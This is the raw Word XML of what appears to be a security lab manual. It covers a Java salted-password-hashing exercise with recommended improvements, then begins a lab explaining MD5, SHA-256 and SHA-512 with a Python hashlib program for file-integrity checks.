      </w:r>
    </w:p>
    <w:p w14:paraId="42FAA6B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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4DAB0F2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="108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authenticateUser(String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String password) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2EE0E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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(userDatabase.containsKey(username))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75338D7D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>String[]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storedData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userDatabase.get(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7DEBB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="1440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hashedPassword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PasswordHasher.hashPassword(password, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>storedData[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8A28B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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storedData[0].equals(hashedPassword);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19409CF1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="20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ED1997F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA9613" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="0000000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D5C10D3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFE31CA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2040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args)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 registerUser("user1", "securePassword");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8E2A1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="783" w:firstLine="960"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>boolean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isAuthenticated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 xml:space="preserve">authenticateUser("user1", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"securePassword");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB28EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact"/>
        <w:ind w:left="2040"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>System.out.println("Authentication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success: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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>isAuthenticated);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4E28C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="156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47F0680" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="108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8293CC9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510DAE28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14DF04C8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC734BD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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Compile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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573F0675" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="8" w:line="223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PasswordHasher.java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UserAuthentication.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E7A181" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:line="265" w:lineRule="exact"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>Run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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B9406" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="7" w:line="223" w:lineRule="exact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UserAuthentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA92EE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:line="265" w:lineRule="exact"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>Observe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registration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authentication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console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output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12438BE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445AF5C8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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093E3D4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7498249D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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PBKDF2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>instead of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256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better </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC18AC2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 securely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instead of an in-memory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HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF4E15C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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lockout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failed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7658B2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A356913" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="274" w:lineRule="exact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2E0CD186" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>◻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hashed passwords with salting, ensuring robust user security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCED06E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1EE220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1222"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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(MD5,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SHA-256,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SHA-512)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 program to verify file integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5E17B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64380F30" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:t>: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(MD5,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SHA-256,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SHA-512)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their outputs to verify file integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB86AB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305A2CFB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2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0E7C7161" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571641B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0BE330F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25DB464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68231E7A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8721F9" wp14:editId="432F08BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297842</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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1704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774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7538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CBA52" id="Group 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.45pt;width:486.1pt;height:1.65pt;z-index:-15727616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&#10;BQYAAAAABAAEAPMAAAC6BwAAAAA=&#10;">
                <v:shape id="Graphic 4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mswgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPGFvmirLqtUosiq7R/+B12fzbKvNS7eJWv30G0HwOMzMb5jxtDaFuFLlcssKup0IBHFi&#10;dc6pgt122R6AcB5ZY2GZFNzJwXTSbIwx1vbGa7pufCoChF2MCjLvy1hKl2Rk0HVsSRy8o60M+iCr&#10;VOoKbwFuCtmLoi9pMOewkGFJ3xkl583FKDjs9PxvNez1dXo/7hc/pwcd6KHUR6uejUB4qv07/Gr/&#10;agWf8LwSboCc/AMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD2pqmswgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m6172200,l,,,19672r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 5" o:spid="_x0000_s1028" style="position:absolute;left:61704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7r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 6" o:spid="_x0000_s1029" style="position:absolute;left:3;top:7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QIxAAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hPKG3mrUFW1ejaKHQHqx0lQVvj81zs7h5WZJUt/++EQoeh5n5hlmsetuKC/nQOFYwGWcg&#10;iCunG64VHPbvj68gQkTW2DomBb8UYLUcDhaYa3flb7oUsRYJwiFHBSbGLpcyVIYshrHriJN3ct5i&#10;TNLXUnu8Jrht5VOWTaXFhtOCwY7eDFXn4scqKL03693XdkOfz92xecnK2SaUSj2M+vUcRKQ+3sP/&#10;7Q+tYAq3K+kGyOUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKt0pAjEAAAA2g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7" o:spid="_x0000_s1030" style="position:absolute;left:61704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6r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 8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7r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 9" o:spid="_x0000_s1032" style="position:absolute;left:3;top:175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n5WxAAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvBb9DeIVepGYrRdvVKGIRCr2s/7DHx+a5G7p5CZuou9++KQg9DjPzG2a+7GwjrtQG41jByygD&#10;QVw6bbhScNhvnt9AhIissXFMCnoKsFwMHuaYa3fjLV13sRIJwiFHBXWMPpcylDVZDCPniZN3dq3F&#10;mGRbSd3iLcFtI8dZNpEWDaeFGj2tayp/dhebKBO/NnZ89JdD8Vqc+s3X8ON7qtTTY7eagYjUxf/w&#10;vf2pFbzD35V0A+TiFwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALzWflbEAAAA2gAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=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55199F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C4A06F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774B9A96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Hash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14:paraId="2A766BA6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0C7C39" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>A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'message')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fixed-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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typically represents the content of the input. Hash functions like MD5, SHA-256, and SHA-512 are commonly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tasks like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checks, password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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digital signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26066409" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E38722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  <w:b/>
        </w:rPr>
        <w:t>MD5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Produces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128-bit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(16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F330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rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>SHA-256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SHA-2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family,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produces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256-bit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(32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D67C7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  <w:b/>
        </w:rPr>
        <w:t>SHA-512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SHA-2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family,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produces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512-bit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(64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bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772065F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6B513E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:t>Each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 the input will drastically change the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C186C1F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF8CEBC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771FC43B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B805A5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="917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MD5,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SHA-256,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and SHA-512 for a given file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BD484E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068BCF7A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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(hash_functions.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA32774" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="44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hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D6674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1AC05DC3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="426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compute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values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given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MD5,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SHA-256,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 xml:space="preserve">SHA- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9D1B6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compute_hash(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F2516" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="270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empty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dictionaries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store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values hashes = {"MD5": "", "SHA-256": "", "SHA-512": ""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4E7B09" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226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Open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binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2CB07" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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'rb')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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C3C5AE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1320" w:right="78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Read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chunks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avoid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memory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overflow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large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files file_data = file.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65835AAF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
